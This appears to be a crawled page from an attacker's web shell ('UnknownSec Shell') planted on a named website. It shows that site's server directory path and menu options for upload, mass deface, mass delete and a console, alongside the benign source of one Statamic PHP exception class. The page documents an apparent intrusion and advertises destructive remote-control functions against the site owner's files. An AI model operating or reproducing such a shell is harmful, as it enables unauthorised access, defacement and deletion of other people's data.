shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Exceptions
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
ApiValidationException.php
<?php namespace Statamic\Exceptions; use Illuminate\Validation\ValidationException; class ApiValidationException extends ValidationException { public function render() { return response()->json(['message' => $this->getMessage()], 422); } }
© 2026 UnknownSec